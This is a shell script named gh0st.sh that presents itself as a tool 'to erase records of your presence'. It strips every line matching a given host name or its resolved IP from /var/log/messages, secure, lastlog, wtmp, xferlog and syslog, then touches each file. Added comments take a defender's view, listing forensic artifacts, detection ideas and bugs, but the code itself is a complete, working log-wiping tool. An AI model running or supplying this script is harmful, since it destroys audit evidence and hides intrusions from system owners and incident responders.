#!/bin/sh
# gh0st.sh - by benz@slacknet.org [http://benz.slacknet.org]
# log parsing shell script to erase records of your presence

# Banner, argument check and address lookup.
# $1 is the host name whose entries the rest of the script filters out of
# the log files.
echo "gh0st.sh - by benz@slacknet.org [http://benz.slacknet.org]"
echo "----------------------------------------------------------"
# No argument: print usage and stop. The exit status is 0 here and on every
# other exit path, so the status says nothing about what was actually done.
if [ "$1" = "" ]; then
 echo "[gh0st]: usage -- $0 <your host>"
 exit 0
fi
# Forward lookup through host(1); awk keeps field 4 of each "has address" line.
# g_ip is empty when nothing resolves and holds several newline-separated
# addresses when the name has more than one; neither case is checked.
# $1 is unquoted, so it is word-split before host(1) sees it.
# Detection: this is a DNS query for the operator's own host name made from
# the affected machine, so it can show up in resolver or DNS query logs.
g_ip=`host $1 | grep "has address" | awk '{print $4}'`
# Pre-flight check: continue only if /var/log exists and is a directory.
echo -n "[gh0st]: looking for /var/log.."
varlog="yes"
if [ ! -d /var/log ]; then
 varlog="no"
fi
echo " $varlog"
# The message names /var/log/messages although the test above is on the
# /var/log directory itself. Exits 0 even though nothing was processed.
if [ "$varlog" != "yes" ]; then
 echo "[gh0st]: unable to access /var/log/messages.."
 exit 0
fi
# /var/log/messages: remove every line that matches the host name ($1) or the
# resolved address ($g_ip, assigned earlier in the script).
#
# Forensic artifacts this section leaves behind (useful when triaging a host):
#  - The log is rebuilt through a scratch file named .msg.tmp in the current
#    working directory and then moved over the original. The path therefore
#    ends up on a newly created file: new inode, owner and mode taken from
#    the invoking user and umask rather than from the original log.
#  - A logging daemon that still holds the old file open would keep writing
#    to the replaced file, so the visible log may stop growing afterwards.
#    NOTE(review): depends on the daemon in use; confirm on the host at hand.
#  - touch stamps the rewritten file with the current time.
#  - Whole lines are dropped, which leaves gaps in the timeline. Copies sent
#    to a remote collector are not touched by anything in this script.
varlogmessages="yes"
if [ ! -f /var/log/messages ]; then
 varlogmessages="no"
fi
# No "looking for" prompt is printed for this file, so the yes/no answer
# appears on a line of its own.
echo " $varlogmessages"
if [ "$varlogmessages" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/messages.."
 # $1 is unquoted and treated as a regular expression: "." matches any
 # character, so lines that merely resemble the host name count as hits too.
 cat /var/log/messages | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip1="yes"
  echo " yes! (poof)" 
  # stdout and stderr are both redirected to .msg.tmp, so any grep error
  # text becomes part of the file that replaces the log.
  cat /var/log/messages | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/messages
  touch /var/log/messages
 fi 
 # ip1 is never initialised; the test relies on it being unset in the
 # environment when no match was found.
 if [ "$ip1" != "yes" ]; then
 echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/messages.."
 # An empty g_ip gives the empty pattern here, which matches every line,
 # so the rewrite branch below is entered on any non-empty log.
 cat /var/log/messages | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip2="yes"
  # $g_ip is unquoted: an empty or multi-line value is word-split, and the
  # outcome (including any grep error output) is what gets moved into place.
  cat /var/log/messages | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/messages 
  touch /var/log/messages
 fi
 if [ "$ip2" != "yes" ]; then
  echo " no."
 fi
fi
 
# /var/log/secure: same two-pass filter, first on the host name ($1), then on
# the resolved address ($g_ip, assigned earlier in the script).
#
# Defender notes for this file:
#  - Each pass writes a filtered copy to .msg.tmp in the current directory and
#    moves it over the log, so the log is replaced rather than edited in
#    place; watching /var/log for rename and create events (file-integrity
#    monitoring, audit rules on the directory) surfaces this.
#  - Forwarding these records to a remote collector as they are written keeps
#    a copy this script cannot reach. An append-only attribute on the file
#    does not prevent the replacement, since a rename is governed by the
#    directory rather than by the file being displaced.
echo -n "[gh0st]: looking for /var/log/secure.."
varlogsecure="yes"
if [ ! -f /var/log/secure ]; then
 varlogsecure="no"
fi
echo " $varlogsecure"
if [ "$varlogsecure" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/secure.."
 # Unquoted $1 is used as a regular expression, so the match is broader than
 # the literal host name.
 cat /var/log/secure | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip3="yes"
  echo " yes! (poof)"
  # Both output streams land in .msg.tmp; the new file is created by the
  # invoking user, so owner and mode can differ from the original log.
  cat /var/log/secure | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/secure
  # Modification time becomes "now", regardless of the last real entry.
  touch /var/log/secure
 fi
 # ip3 is only ever set inside the branch above.
 if [ "$ip3" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/secure.."
 cat /var/log/secure | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip4="yes"
  # $g_ip is unquoted here although it was quoted in the test above, so the
  # two commands can see different arguments when g_ip is empty or multi-line.
  cat /var/log/secure | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/secure
  touch /var/log/secure
 fi
 if [ "$ip4" != "yes" ]; then
  echo " no."
 fi
fi
# /var/log/lastlog: the same line-oriented grep / grep -v rewrite as for the
# text logs, keyed on $1 and on $g_ip (assigned earlier in the script).
#
# NOTE(review): on most Linux systems lastlog is a binary file of fixed-size
# records rather than text. A line-based rewrite would not edit such a file
# cleanly, and the result is likely to be a damaged or shortened file that
# lastlog(8) reports oddly, which is itself an indicator worth checking for.
# Confirm the format on the platform being examined.
echo -n "[gh0st]: looking for /var/log/lastlog.."
varloglast="yes"
if [ ! -f /var/log/lastlog ]; then
 varloglast="no"
fi
echo " $varloglast"
if [ "$varloglast" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/lastlog.."
 cat /var/log/lastlog | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip5="yes"
  echo " yes! (poof)"
  # The replacement is built in .msg.tmp (current directory) with stdout and
  # stderr merged, then moved over the original path.
  cat /var/log/lastlog | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/lastlog
  touch /var/log/lastlog
 fi
 if [ "$ip5" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/lastlog.."
 cat /var/log/lastlog | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip6="yes"
  cat /var/log/lastlog | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/lastlog
  touch /var/log/lastlog
 fi
 if [ "$ip6" != "yes" ]; then
  echo " no."
 fi
fi
# /var/log/wtmp: the same line-oriented rewrite, keyed on $1 and on $g_ip
# (assigned earlier in the script).
#
# NOTE(review): wtmp is normally a binary login-record file, not text. A
# grep -v pass treats it as lines, so the rewritten file is likely to be
# misaligned or truncated; records that last(1) cannot parse, or a wtmp whose
# size is not a whole number of records, are indicators to look for. Confirm
# the record format on the platform being examined.
echo -n "[gh0st]: looking for /var/log/wtmp.."
varlogwtmp="yes"
if [ ! -f /var/log/wtmp ]; then
 varlogwtmp="no"
fi
echo " $varlogwtmp"
if [ "$varlogwtmp" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/wtmp.."
 cat /var/log/wtmp | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip7="yes"
  echo " yes! (poof)"
  # Replacement is written to .msg.tmp in the current directory and moved
  # over the original, so the path ends up on a newly created file.
  cat /var/log/wtmp | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/wtmp
  touch /var/log/wtmp
 fi
 if [ "$ip7" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/wtmp.."
 cat /var/log/wtmp | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip8="yes"
  cat /var/log/wtmp | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/wtmp
  touch /var/log/wtmp
 fi
 # NOTE(review): this tests ip7 (the host-name result) although the branch
 # above sets ip8, so the printed yes/no for the address pass can be wrong.
 # Only the status text is affected.
 if [ "$ip7" != "yes" ]; then
  echo " no."
 fi
fi

# /var/log/xferlog: two-pass filter on the host name ($1) and on the resolved
# address ($g_ip, assigned earlier in the script).
#
# Artifacts to look for: a leftover .msg.tmp in the working directory if a
# move failed, a log whose owner/mode/inode no longer match the service that
# normally writes it, and a modification time set by touch that does not line
# up with the timestamp of the last entry inside the file.
echo -n "[gh0st]: looking for /var/log/xferlog.."
varlogxfer="yes"
if [ ! -f /var/log/xferlog ]; then
 varlogxfer="no"
fi
echo " $varlogxfer"
if [ "$varlogxfer" = "yes" ]; then 
 echo -n "[gh0st]: checking for your host in /var/log/xferlog.."
 cat /var/log/xferlog | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip8="yes"
  echo " yes! (poof)"
  # stdout and stderr both go to .msg.tmp, which then replaces the log.
  cat /var/log/xferlog | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/xferlog
  touch /var/log/xferlog
 fi
 # NOTE(review): ip8 is also set by the wtmp section earlier in the script,
 # so it may already be "yes" here and suppress the " no." line. Only the
 # status text is affected.
 if [ "$ip8" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/xferlog.."
 cat /var/log/xferlog | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip9="yes"
  cat /var/log/xferlog | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/xferlog
  touch /var/log/xferlog
 fi
 if [ "$ip9" != "yes" ]; then
  echo " no."
 fi
fi 

# /var/log/syslog: two-pass filter on the host name ($1) and on the resolved
# address ($g_ip, assigned earlier in the script).
#
# Scope note for responders: only the current file at this exact path is
# rewritten. Nothing here touches rotated or compressed generations, other
# files under /var/log, or records already forwarded off the host, so those
# remain available for comparison against the rewritten file.
echo -n "[gh0st]: looking for /var/log/syslog.."
varlogsys="yes"
if [ ! -f /var/log/syslog ]; then
 varlogsys="no"
fi
echo " $varlogsys"
if [ "$varlogsys" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/syslog.."
 # Unquoted $1 is a regular expression here, not a literal string.
 cat /var/log/syslog | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip10="yes"
  echo " yes! (poof)"
  # The filtered copy is built in .msg.tmp and moved over the log; the path
  # then refers to a new file created by the invoking user.
  cat /var/log/syslog | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/syslog
  touch /var/log/syslog
 fi
 if [ "$ip10" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/syslog.."
 cat /var/log/syslog | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip11="yes"
  cat /var/log/syslog | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/syslog
  touch /var/log/syslog
 fi
 if [ "$ip11" != "yes" ]; then
  echo " no."
 fi
fi
# Always prints the completion line and exits 0, whether or not any file was
# found or rewritten; no step above checks the result of mv or touch.
echo "[gh0st]: parsing complete. eof"
exit 0
